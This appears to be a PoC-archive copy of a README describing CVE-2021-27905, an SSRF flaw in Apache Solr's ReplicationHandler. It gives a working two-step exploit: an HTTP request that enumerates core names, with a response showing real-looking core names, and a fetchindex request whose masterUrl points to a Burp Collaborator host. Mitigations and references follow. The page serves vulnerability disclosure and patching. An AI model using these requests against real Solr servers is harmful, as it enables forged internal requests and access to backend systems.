关联漏洞
标题:Apache Solr 代码问题漏洞 (CVE-2021-27905)Description:Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。
Description
[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)
介绍
<b>[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Apache Solr (stands for Searching On Lucene with Replication) is a free, open-source search engine based on the Apache Lucene library. Written in Java. Apache Solr has RESTful XML/HTTP and JSON APIs and client libraries for many programming languages such as Java, Phyton, Ruby, C#, PHP, and many more being used to build search-based and big data analytics applications for websites, databases, files, etc.
Apache Solr `all versions prior to 8.8.2 (7.0.0 to 7.7.3 and 8.0.0 to 8.8.1)` are vulnerable to Server Side Request Forgery (SSRF) vulnerability. Successfully exploitation of this vulnerability may lead to unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other backend systems that the application can communicate with.
The ReplicationHandler (normally registered at `/replication` under a Solr core) has a `masterUrl` (also `leaderUrl` alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the `shards` parameter. Prior to this vulnerability getting fixed, it did not.
<b>Proof of Concept (PoC):</b> In order to exploit this vulnerability, an attacker has to know the core name on Apache Solr. That's why the following request can be used for determining core name/names.
```
GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: vulnerablehost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
```
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Connection: close
{
"responseHeader":
{
"status": 0,
"QTime": 0
},
"initFailures":
{},
"status":
{
"beliana_dev":
{
"name": "beliana_dev",
"instanceDir": "/var/solr/data/beliana_dev",
"dataDir": "/var/solr/data/beliana_dev/data/",
"config": "solrconfig.xml",
"schema": "schema.xml",
"startTime": "2021-04-20T13:49:06.569Z",
"uptime": 293226747
},
"beliana_prod":
{
"name": "beliana_prod",
"instanceDir": "/var/solr/data/beliana_prod",
"dataDir": "/var/solr/data/beliana_prod/data/",
"config": "solrconfig.xml",
"schema": "schema.xml",
"startTime": "2021-02-02T06:07:19.668Z",
"uptime": 6973733649
},
"beliana_stage":
{
"name": "beliana_stage",
"instanceDir": "/var/solr/data/beliana_stage",
"dataDir": "/var/solr/data/beliana_stage/data/",
"config": "solrconfig.xml",
"schema": "schema.xml",
"startTime": "2021-02-02T06:07:19.668Z",
"uptime": 6973733649
}
}
}
```
After determined core names, just select one of these and make a request to this endpoint: `/solr/{core_name}/replication/?command=fetchindex&masterUrl={ssrf_here}`
```
GET /solr/beliana_dev/replication/?command=fetchindex&masterUrl=http://4rwzji8a3i6xi33sjoml8qdda4gv4k.burpcollaborator.net HTTP/1.1
Host: vulnerablehost:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
```xml
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Sat, 01 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 23 Apr 2021 23:16:50 GMT
ETag: "1790105893b"
Content-Type: application/xml; charset=UTF-8
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<response>
<lst name="responseHeader">
<int name="status">0</int>
<int name="QTime">75</int>
</lst>
<str name="status">OK</str>
</response>
```
<b>Mitigation:</b> Any of the following are enough to prevent this vulnerability
* Upgrade to Solr `8.8.2` or greater.
* If upgrading is not an option, consider applying the patch in [https://issues.apache.org/jira/browse/SOLR-15217](SOLR-15217)
* Ensure that any access to the replication handler is purely internal to Solr. Typically, it's only accessed externally for diagnostic/informational purposes.
<b>References:</b>
* [https://github.com/apache/solr-site/blob/eb060a0d2cf1d31de403665407fff7a0255578ec/content/solr/security/2021-04-12-cve-2021-27905.md](https://github.com/apache/solr-site/blob/eb060a0d2cf1d31de403665407fff7a0255578ec/content/solr/security/2021-04-12-cve-2021-27905.md)
* [https://github.com/apache/solr/pull/47/files/c12bbae4da0719435cf5e19623f6dad83f0c8c65#diff-838f63a8d7b764661b66c758c19cfe6f3d6454b328a1b5f52f75480530b0cfe7](https://github.com/apache/solr/pull/47/files/c12bbae4da0719435cf5e19623f6dad83f0c8c65#diff-838f63a8d7b764661b66c758c19cfe6f3d6454b328a1b5f52f75480530b0cfe7)
* [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27905)
* [https://www.anquanke.com/post/id/238201](https://www.anquanke.com/post/id/238201)
文件快照
[4.0K] /data/pocs/a915baa63d090fe61bc380e169bf288e8ce6ff38
└── [6.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。